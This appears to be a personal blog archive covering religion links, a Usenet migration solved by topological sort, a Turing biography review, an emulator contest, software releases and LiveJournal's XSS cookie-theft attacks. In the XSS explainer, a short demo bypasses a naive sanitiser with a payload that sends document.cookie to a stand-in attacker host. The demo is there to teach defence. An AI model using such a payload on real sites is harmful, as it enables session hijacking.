The Punchtape Letters

"My Dear Malware,

Thank you for your latest news. I agree that your bombarding of on-line programming sites with questions about “cascading style sheets” (whatever they may be) and “rounded corners” (as if anyone cared) will irritate and annoy a certain number (possibly even a large number) of programmers, but it seems a lot of effort to go to."
(tags: funny programming computers c.s.-lewis parody screwtape c++)

Creating God in one’s own image

Research in the psychology of religion shows that people tend to think God thinks what they think: "People may use religious agents as a moral compass, forming impressions and making decisions based on what they presume God as the ultimate moral authority would believe or want. The central feature of a compass, however, is that it points north no matter what direction a person is facing. This research suggests that, unlike an actual compass, inferences about God's beliefs may instead point people further in whatever direction they are already facing."
(tags: religion psychology science politics god morality)

Atheism: Proving The Negative: Encyclopedia Entry: Atheism

Matt McCormick's draft of an encyclopedia entry on various arguments for and against atheism.
(tags: atheism religion matt-mccormick theodicy design kalam)

In the Pipeline: Things I Won’t Work With

Derek Lowe, a medicinal chemist, has a section of his blog on the subject of really nasty chemicals. Light-hearted yet terrifying.
(tags: science funny humour smell chemistry dangerous explosives)

Troy Jollimore on Karen Armstrong’s ‘The Case for God’ – Book Review

"Armstrong may perhaps make a plausible claim in asserting that faith, as understood by mainstream religious traditions before the advent of modernity, involved more than “mere” belief in the modern sense; but if the problem with religious life is that it encourages false, absurd, unjustified beliefs, showing that it does other things as well is not sufficient."
(tags: religion philosophy atheism karen-armstrong apophatic christianity)

The site of the book of the sites, The Internet, now in handy book form, is good fun. Crackbook and Poormatch are particularly well observed. It reminded me of TV Go Home, but a little less bitter and scatological (only a little, mind you).

Quotable quotes of the week:

“… any time anyone’s said anything comprehensible about the Trinity the Church has declared it a heresy.” – gjm11 on a Rilstone post created specifically for him.

“The universe tends toward maximum irony. Don’t push it.” – jwz on taking reliable backups (which is much harder on a Mac than it ought to be).

“All those fine words about the rule of law safeguarding our liberties, the arbitrary exercise of power and Bunker Hill, Lexington and Normandy went right out the window on 9/11. That was when Henry and the rest of his stalwart defenders of the rule of law promptly wet their pants and then let their president use the constitution to clean up the puddle.” – Digby, via a friend of a friend.

There’s an option that I might have considered instead of apostasy. Unfortunately, in those conservative days, you couldn’t really do that sort of thing. These days, if LiveJournal is anything to go by, it’s all the rage. A woman tells us how she’s in an open relationship with Jesus.

This is an article about the sort of thing I spend my days doing. Usually, I can’t talk about that, for reasons of commercial confidentiality, however, this particular case is completely unrelated to anything my employer sells, so I should be OK. I’ve tried to explain things sufficiently well that someone non-technical can get it. Hopefully it’s not too dull or incomprehensible.

First, we need some technical background…

The Naming of the Parts

A graph is a bunch of things connected by lines. The CDC Snog Graph is an example of what I mean. The things (representing people, in this case) are known as vertices or nodes, and the lines (representing joyous sharing experiences of some sort, in this case) are known as edges.

The lines on the Snog Graph don’t have a direction, so we call it an undirected graph. If you add a direction to each edge, you get a directed graph, which we can represent by putting arrows on the lines. Friendship on Facebook can be represented as an undirected graph (where the nodes are people and the edges mean “is friends with”), because all friendships are mutual, but LiveJournal friendships need a directed graph to represent them, since I can be your friend without you being mine, and vice versa.
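For the programmers in the audience, here's roughly how you might represent the two kinds of graph in Python, using adjacency sets (the function names are mine, nothing standard):

```python
# A minimal sketch: directed and undirected graphs as adjacency sets.
# The names and example people here are invented for illustration.

def add_directed_edge(graph, a, b):
    """a -> b: LJ-style friendship, not necessarily mutual."""
    graph.setdefault(a, set()).add(b)
    graph.setdefault(b, set())  # make sure b exists as a node too

def add_undirected_edge(graph, a, b):
    """a -- b: Facebook-style friendship, always mutual."""
    add_directed_edge(graph, a, b)
    add_directed_edge(graph, b, a)

lj = {}
add_directed_edge(lj, "alice", "bob")  # alice friends bob...
print("bob" in lj["alice"])    # True
print("alice" in lj["bob"])    # False: bob hasn't friended alice back
```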

A graph is cyclic if there’s a way to walk along edges starting at one node (following the arrows if the edges are directed) and get back to that node again without walking the same edge more than once. The Snog Graph is cyclic, as is the graph of friendships on Facebook or LJ (trivially so on LJ, where it’s possible to friend yourself; regular dancers might consider how this applies to their graph, vis-à-vis people who consider avoiding other dancers an optional extra). Graphs where you cannot do this are called acyclic.

Usenet news: you tell kids today that, and they don’t believe you

Usenet is an electronic discussion system which pre-dates all this newfangled World Wide Web nonsense. It distributes messages which are known as articles. It has some desirable features that web-based discussion forums often lack, like comment threading and remembering what you’ve already read. These days, people think Usenet is owned by Google, but in fact it’s a distributed system, with no central server (another advantage over LJ). When you want to talk to Usenet without using Google, you run a client program on your own machine, which talks to your local server. Your local server forwards your article to servers it knows about, which then forward it to servers they know about, and so on (the path of an article through the servers forms a directed acyclic graph, in fact). When you want to read other people’s articles, your client program fetches them from your local server.

Each article is posted to one or more groups, which are like communities on LJ. Note that, unlike LJ, the same article can be posted to more than one group without having to cut and paste it: the same article exists in each group it is cross-posted to.

On each server, articles have a number within each group. The first article to arrive in a group has number 1, the second article number 2, and so on. Cross-posted articles have more than one number, one for each group the article appears in.

Article numbers differ between servers, because the order of arrival depends on the path the article has taken to reach the server, but since your client program only talks to your local Usenet server, it usually refers to articles by their number (there’s also a unique string of letters and numbers which identifies the article, which is how servers know which ones they’ve seen already, but that’s not important right now). Remembering which articles you have read is then just a matter of storing some ranges of numbers for each group (so your client might remember that you have read articles 1-100, 243-299 and 342-400, say).
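If you fancy seeing that in code, here's a rough Python sketch of keeping read articles as ranges and merging them as you read. This is just the idea, not any real client's storage format:

```python
# Sketch: remembering read articles as ranges of article numbers,
# merging adjacent ranges as new articles are read.

def is_read(ranges, number):
    """Is this article number inside any read range?"""
    return any(lo <= number <= hi for lo, hi in ranges)

def mark_read(ranges, number):
    """Add a number, merging any ranges that now touch or overlap."""
    merged = []
    for lo, hi in sorted(ranges + [(number, number)]):
        if merged and lo <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(hi, merged[-1][1]))
        else:
            merged.append((lo, hi))
    return merged

read = [(1, 100), (243, 299), (342, 400)]
print(is_read(read, 50))     # True
print(is_read(read, 150))    # False
print(mark_read(read, 101))  # [(1, 101), (243, 299), (342, 400)]
```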

The problem

We wanted to decommission a Usenet server and move its articles to another server. The servers run different and incompatible software, so the most obvious way to get articles from one server to another is to post them like a client or another server would.

The new server is supposed to be a drop-in replacement for the old one, so we can’t change the numbers or the existing client programs will get confused and think you’ve read articles you haven’t, or vice versa. So you can’t just grab all the articles from the old server any old how and post them to the new one, because they’ll be jumbled up. Unfortunately, the old server has no way of directly telling us the precise order that articles arrived in, though it will tell us article numbers within each group.

“Aha!”, we think. Since the order of arrival matters, we’ll grab the articles in order from one group on the old server, post them in that order on the new server, and move on to the next group, where we’ll do the same, and so on until we’ve done all the groups.

This idea is ruined by cross-posts, because they have more than one article number associated with them. If a cross-posted article is number 10 in one group and number 3 in another, you’d better post the first 9 articles to the first group, the first 2 to the second group, and then you can make the cross-post. But maybe there’s a cross-post to a third group in those 9 articles, so you’ll need to get that group up to date before you can post one of those. How do you work out what order to post the articles in?

Obscure Unix tools to the rescue

You might have guessed that the wibbling about graphs wasn’t entirely tangential to all this. You can draw a graph of the problem. Each article is a node. For each group, connect each article to the one with the next number up by a directed edge (in this case, the arrow means “must be posted before”). You’ve drawn yourself a directed acyclic graph, acyclic because article numbers within a group only ever increase. The cross-posted articles are then nodes with more than one edge coming into them.

One of the wizards at work realised this, and also pointed out that there’s a standard Unix tool for converting such graphs into a list of nodes whose order preserves the order implied by the arrows, a procedure which is known as a topological sort. The tool’s called tsort. From there, it’s just a matter of representing each article in the way tsort understands. When you do that, tsort gives you an order in which you can post the articles from the old server to the new server so they’ll be given the same numbers on the new server as they had on the old one.
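If you'd like to see the shape of it, here's a rough sketch using Python's standard-library graphlib, which does the same job as tsort. The article names and groups are made up:

```python
# Sketch of the tsort approach: graphlib.TopologicalSorter plays the
# part of Unix tsort. Article identifiers and groups are invented.
from graphlib import TopologicalSorter

# For each group, list its articles in article-number order.
groups = {
    "alt.example":  ["a1", "a2", "xpost"],  # xpost is number 3 here...
    "misc.example": ["b1", "xpost", "b2"],  # ...and number 2 here
}

deps = TopologicalSorter()
for articles in groups.values():
    for earlier, later in zip(articles, articles[1:]):
        deps.add(later, earlier)  # 'earlier' must be posted before 'later'

order = list(deps.static_order())
# Every article comes after all its predecessors in every group:
print(order.index("xpost") > order.index("a2"))   # True
print(order.index("xpost") > order.index("b1"))   # True
print(order.index("b2") > order.index("xpost"))   # True
```

Posting the articles in `order` then reproduces the old server's numbering in every group at once.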

In which I’m not as knowledgeable as the wizards

The way I thought of to do it was to write my own program. You pick a group, and start trying to post articles from the old to the new server in article number order. If they’re not cross-posted, you just keep going. When you hit a cross-posted article, you switch to each group it is cross-posted to in turn, and try to post all the articles before the cross-post to each of those groups. If, while you’re doing that, you hit another cross-post, you remember where you got up to and do exactly the same thing with the groups that second cross-post is posted to; when you’ve done that, you switch back to the groups for the first cross-post. I had a working version of this at about the same time as someone pointed out that tsort does the job 🙂

(Aside for the techies: this can be done using recursion. It looks like this is pretty much equivalent to one of the ways of doing a topological sort, namely the depth-first search mentioned on the Wikipedia page).
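For the curious, the depth-first idea sketched above looks something like this in Python (again with made-up article names, and simplified to bare recursion rather than my actual program):

```python
# Sketch of the depth-first approach: recurse into an article's
# predecessors before emitting the article itself.

def post_order(predecessors):
    """predecessors maps article -> articles that must be posted
    before it. Returns a valid posting order."""
    order, done = [], set()

    def visit(article):
        if article in done:
            return
        done.add(article)
        for earlier in predecessors.get(article, []):
            visit(earlier)       # deal with the cross-post's groups first
        order.append(article)    # then post the article itself

    for article in predecessors:
        visit(article)
    return order

# xpost is article 3 in one group and article 2 in another:
preds = {"a2": ["a1"], "xpost": ["a2", "b1"], "b2": ["xpost"]}
order = post_order(preds)
print(order.index("xpost") > order.index("b1"))  # True
```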

So I learned about topological sorts by re-inventing one. Most of the problems I deal with aren’t in fact cases of well-known problems (although I would say that if I was merely bad at recognising the fact, wouldn’t I?), but when they are, recognising that can save a lot of time.

And that’s what I do when I’m not on holiday.

I recently finished Andrew Hodges’s Alan Turing: the Enigma. The book is a definitive account of Turing’s life and work. In some places I found the level of detail overwhelming, but in others I admired the way Hodges uses his obviously extensive research to evoke the places and people in Turing’s life. The book is well worth reading for the perspective it gives on Turing, something which is absent from other, purely technical, accounts of his work.

Hodges portrays Turing as a man ahead of his time, conceiving of the Turing machine as a thought experiment before the invention of the general purpose electronic computer, and inventing the Turing test when computing was in its infancy. Turing’s naivete was reflected in his refusal to accept received opinion about what could be done, but also in a lack of interest in the politics of his post-war work on computers and of his own homosexuality. A proto-geek, Turing was prickly, odd, and seemed to expect that the facts alone, when shown to people, would lead them to the same conclusions he had reached.

Turing’s suicide is placed in the context of a move from regarding homosexuality as criminal to regarding it as a medical problem, and an increasing suspicion of homosexuals in classified government work. Hodges seems to conclude that Turing felt he had nowhere else to go.

You can’t help but wonder what else Turing might have accomplished had he not committed suicide. Greg Egan’s short story Oracle is an entertaining what-if, which also features a character very obviously based on C.S. Lewis. What if Turing had received help from a friend? It’s a pity that in reality there was no-one to lead him out of his cage.

Some of you might have played with emulators which let your PC pretend to be the classic computers of your youth (the BBC Micro, Acorn Electron, Commodore 64 and so on). The emulators work by simulating the processors in those machines on your PC, so you end up with Chuckie Egg running on a virtual BBC Micro running on a PC running on whatever the underlying physics of the universe happen to be.

robhu found a puzzle based on a similar idea. The International Conference on Functional Programming have an annual contest. Last year’s was particularly fun:

In 1967, during excavation for the construction of a new shopping center in Monroeville, Pennsylvania, workers uncovered a vault containing a cache of ancient scrolls. Most were severely damaged, but those that could be recovered confirmed the existence of a secret society long suspected to have been active in the region around the year 200 BC… Among the documents found intact in the Monroeville collection was a lengthy codex, written in no known language and inscribed with superhuman precision.

You’re given the codex, and the specification for a processor used by the Cult of the Bound Variable. Once you’ve written an emulator for that processor, you’re off (unless, like me, you write the emulator in a few hours and spend half a day corrupting the files from the contest website with your editor and wondering why it isn’t working). There’s an ancient Unix system, complete with ancient spam, and various puzzles which I’ve not had a chance to look at yet.

According to reports on the contest, lots of people tried to write the emulator in high level languages where it ran like treacle. A C implementation like mine (which may count as a spoiler for people who want to do it themselves) without any namby-pamby array bounds checking nonsense works fast enough that you can’t tell you’re not talking to a real ancient Unix system. There’s life in the C language yet.
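If you've never written one, an emulator's core is just a fetch-decode-dispatch loop. Here's a toy Python example of the general shape; the instruction set below is entirely invented for illustration and is emphatically not the contest's actual machine, whose spec you should go and read yourself:

```python
# Toy fetch-decode-dispatch loop. The instruction encoding here is
# made up: opcode in the top 4 bits, register operands packed lower down.

def run(program):
    regs = [0] * 8
    pc = 0
    while pc < len(program):
        instr = program[pc]
        op = instr >> 28            # fetch and decode...
        a = (instr >> 16) & 0x7
        b = (instr >> 8) & 0x7
        c = instr & 0x7
        pc += 1
        if op == 0:                 # ADD: regs[a] = regs[b] + regs[c]
            regs[a] = (regs[b] + regs[c]) & 0xFFFFFFFF
        elif op == 1:               # LOADI: regs[a] = low 16 bits
            regs[a] = instr & 0xFFFF
        elif op == 2:               # HALT
            break
    return regs

# LOADI r1, 2; LOADI r2, 3; ADD r0, r1, r2; HALT
prog = [(1 << 28) | (1 << 16) | 2,
        (1 << 28) | (2 << 16) | 3,
        (0 << 28) | (1 << 8) | 2,
        (2 << 28)]
print(run(prog)[0])  # 5
```

In an interpreted language, every one of the emulated machine's instructions costs you this whole decode dance, which is why the treacle effect the contestants reported is so pronounced.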

I’m lost in admiration for the people who produced the codex. It required writing a compiler backend targeting the fictional processor, and implementing various other languages on top of that, as well as coming up with the puzzles. I’m not sure how far I’ll get with the puzzles before my ability or patience expires, as I’m a hacker rather than a computer scientist, but still, the thing is amazingly cool. It’s a time sink for geeks, so I pass it on to those of you who, like me, will waste many days on it. Have fun.

I am currently laid up. I’ve been trying out Firefox 2.0. It looks quite good. On the Mac, it’s faster than 1.5 and doesn’t get bogged down when you leave it running for a long time (I tend to send the Powerbook to sleep rather than shutting it down). I’ve not tried it on Windows yet, as I use Mozex for editing Wiki entries at work, and that’s not been updated for 2.0. The essential extensions have been updated, though: AdBlock and Greasemonkey being the two I use the most. It’s always a shock to use someone else’s machine and find their intarweb has adverts. I mean, how quaint. And you need Greasemonkey for LJ New Comments, which the people on lj_nifty seemed to like, bless ’em.

I like the spelling checker for form entries, and the way that you can now have it save and restore sessions, move tabs around, and put a close tab button in the corner of each tab. The smart completion thingy for Google searches is quite nice, as is the way that sites can offer their own search plugins which Firefox picks up on and can then install automatically (you can tell the site offers a plugin when the little arrow in the search box glows blue: thanks to marnanel for pointing that one out). I like the way that it can be configured to add RSS feeds to Bloglines, too.

While I was enjoying all this web 2.0 excitement, I thought I’d try out a social bookmarking site: it lets you store your bookmarks externally, so you can find them on any computer, and also lets you tag them with keywords so you can find them again easily (which is my main reason for using it: my bookmarks were getting out of control). You can see my bookmarks here, and there’s also an RSS feed of them if you’d like to stalk me.

Dear Lazyweb

I’d like some sort of house server thingy. scribb1e and I both have laptops, so we’d like somewhere to back up important stuff. scribb1e has read the Pragmatic Programmer book and would like to keep her life under version control, which I think means Subversion here (not quite as good as Perforce, but free). I have the vague idea that we could connect something to the stereo and play my extensive collection of mp3z through it. We’d like the box to be more or less silent and quite small.

Possible candidates include the Mac Mini and the NSLU2, affectionately known as the Slug. With the Slug, I’d buy a big external drive onto which I would put a proper Linux distribution, as described on the web page. You don’t seem to be able to buy small and quiet server boxes if you don’t want to mess around with ordering the bits and building them yourself, which I don’t.

The Mini’s standard disk size is a bit small, but other than that it certainly does everything we want. However, it’s somewhat pricey for a box we’re not going to use interactively. The Slug is a lot cheaper but will require me to resurrect my Linux-fu (and if I want sound output, get into the sort of horrific kernel nargery that made jwz buy a Mac). I could buy the Slug and some other networked audio output thingy, as I’ve heard you can get those these days, but I’ve no experience with them.

This must be a fairly common thing in other geek households. What have the rest of you done?

A couple of shiny new bits of software have come out in the last few weeks. Both of them are at version 7, for some reason.

Inform 7

Inform 7 is the latest version of Inform, the language for creating interactive fiction. The interesting thing about it is that Inform 7 programs are written in a subset of English:

The wood-slatted crate is in the Gazebo. The crate is a container. Instead of taking the crate, say “It’s far too heavy to lift.”

Inform is not capable of understanding arbitrary written English, but has a set of sentence forms it understands, and some inference rules built in (for example, if you tell it that “Mr Brown wears a hat”, it will infer that Mr Brown is a person).

scribb1e pointed out that this makes the work of writing the story similar to playing it. That could turn out to be a bad thing: most programming languages are so stylised and full of random punctuation symbols that programmers realise they’re not writing English and don’t try writing arbitrary English text in the hope of being understood by the computer. Even for people who understand Inform isn’t actually intelligent and that they have to write in Inform’s dialect to be understood, writing in something close to English will make it harder to remember to restrict their vocabulary. At worst, it could become a game of guess the verb, which would be painful (as opposed to a game of Guess The Verb, which I thought was fun, especially the Old Man River bit in the help).

However, unlike playing a game, looking at the excellent and witty online help doesn’t risk spoiling your fun. Since it’s all English, it’s easy to crib paragraphs of text from the examples and adapt them to your own works. Hopefully, writing the games in English will enable more people to create them without feeling that they have to be expert programmers. They’ll still have to think like a programmer, but won’t face the intimidating prospect of curly brackets.

Inform 7 itself isn’t just the compiler, it’s a complete suite of tools for writing, testing and releasing interactive fiction, the IF equivalent of an Integrated Development Environment. It’s rather nice (although not yet available for anything other than Windows and Mac OS, because of the difficulty of getting the graphical stuff going on a variety of platforms).

Vim 7

I use the Vim editor, which is the old Unix vi with all the features you want from a modern programmer’s editor bolted on. New in Vim 7 there’s a spelling checker, “Intellisense™”-style context-sensitive completion of names in code, and tabbed windows (no software is complete without tabbed windows these days).

The completion stuff is particularly useful, as it now pops up a menu of possible completions which you can select from with the cursor keys, and appears to be trying harder to find completions from nearby files in the background as you’re typing (I’ve not quite worked out what it’s doing yet, it’s reaching the stage where it’s just magic). Completion isn’t just for programmers, of course: when I’m typing an email, if I find myself using the same, long, word more than once, typing the initial letters and then letting Vim complete it is a boon.

The recent change to LJ’s URL formats seems to be part of an attempt to defend against one or more attacks which allow the attacker to steal another LJ user’s credentials, gaining the ability to impersonate that user. The theft occurs when the victim visits a page on LiveJournal which contains some malicious Javascript inserted by the attacker (more technical details below for those that care).

What’s been happening?

Slashdot linked to an article with some more details on the attacks. This article includes details supplied by the Bantown group (whose site you probably want to visit using lynx). Bantown have used these attacks to pwn LiveJournal quite comprehensively: the comments on the news entry included the same demand from tens of different users. It’s likely that these users all had their credentials stolen by Bantown.

I found a comment quoting an explanation of the vulnerability in an entry on lj_dev, but that entry has now been deleted. The quoted explanation is about a vulnerability which only applies to browsers based on Mozilla (so, Mozilla, Firefox and Netscape). The Bantowners claim that this is not the vulnerability they were using, as they have a vulnerability which affects all browsers. LJ recently patched a vulnerability which would do the job for all browsers, but it’s possible there are other, similar, vulnerabilities in LJ’s code. Or it’s possible that the Bantown people are lying.

Is it fixed?

LJ went down for a while on Friday afternoon, and seems to have invalidated all existing cookies. However, bradfitz is keeping quieter than I’d like about whether the risks still exist and about what workarounds users can use while LJ’s crack programmers are working on a fix. bradfitz‘s use of “soon” suggests that the URL change was part of further changes. These further changes aren’t in place as I write this, which I think means that it’s still possible to use whatever attack the Bantowners have been using to steal credentials, although it’s not possible for an attacker to use an old set of credentials from logins before this afternoon.

Edited: LJ has now fixed this, so it’s safe to turn Javascript on again.

What can we do about it?

For now, I’m running with NoScript turned on, and using that to disable Javascript for all but trusted sites, of which LJ obviously isn’t one. LJ’s lack of communication about the risks to user data, and about possible workarounds, displays a worrying incompetence, as I’ve said elsewhere.

The Science Part

LJ uses cookies, small pieces of data stored by your web browser, as your credentials. When you log in to LJ, you get a cookie. From then on, your browser presents the cookie whenever it requests a page from LJ. LJ trusts you because you have the cookie, and lets you do things that only you should be able to do. The cookie can persist just until you close your browser, or longer if you’ve ticked the “remember me” option when you log in.

The attacks on LJ are cross-site scripting or XSS attacks. A script running on a particular page can access the cookies for that page. Currently, any Javascript running on an LJ page can see your cookie, because the same cookie applies to the entire site. If an attacker can cause their own Javascript to run on a page supplied by LJ, they can steal that cookie and send it to a remote server that they own.

How might the attacker get their script onto LJ’s pages? Well, LJ lets you submit HTML as entries, comments, and as your own styles, and then displays it on its pages. LJ attempts to sanitise the HTML you supply it, but if it doesn’t do this correctly, the attacker has a way in. They can put their Javascript on the page, and visiting that page would then send your cookie to their server. Also, browsers based on Mozilla (such as Netscape and Firefox) allow stylesheet authors to embed Javascript in a CSS stylesheet, so the way LJ lets users reference their own external stylesheet is another security hole (although as I said above, it’s possibly not the one that the Bantown people are using).
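To see why sanitising is hard to get right, here's a toy example (in Python, and emphatically not LJ's actual code) of a naive single-pass filter being defeated by nesting:

```python
# Sketch: a naive blacklist sanitiser that strips <script> tags in a
# single pass can be defeated by nesting the forbidden tag inside itself.
import re

def naive_sanitise(html):
    # Remove <script> and </script> tags -- but only once.
    return re.sub(r'(?i)</?script[^>]*>', '', html)

evil = ("<scr<script>ipt>"
        "document.location='http://attacker.example/?'+document.cookie"
        "</scr</script>ipt>")

print(naive_sanitise(evil))
# Stripping the inner tags splices the outer halves back together,
# leaving a working <script> tag behind.
```

The general lesson is that safe HTML filtering needs a real parser and a whitelist of allowed elements, not string surgery.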

There’s some more discussion of how this works (in amongst a lot of sarcasm) in this thread on jameth‘s journal.

The LJ New Comments script now copes better with the bewildering variety of journal styles that are out there. I also stopped it from giving up in disgust if a style allows it to see the comments but doesn’t provide a permanent link to each comment, as the “n” and “p” keys will still work in these styles (see peacerose‘s journal, for example).

I’m now using scrollIntoView to move each new comment to the top as you click or press keys, so you don’t get a new history entry for each comment you visit (I was annoyed with having to hit the “Back” button multiple times to leave the entry). The docs for Greasemonkey allege that scrollIntoView doesn’t work within Greasemonkey unless you do special stuff, but I seem to be getting away with it. Possibly I’ve broken the script for people not using Firefox 1.5, but such people need to feel the white heat of technology, anyway.

Ph34r my sk1llz!

ETA: Except that I broke it again trying to make it handle all the extra ways of denoting comments. v0.4, now on the site, seems to be working.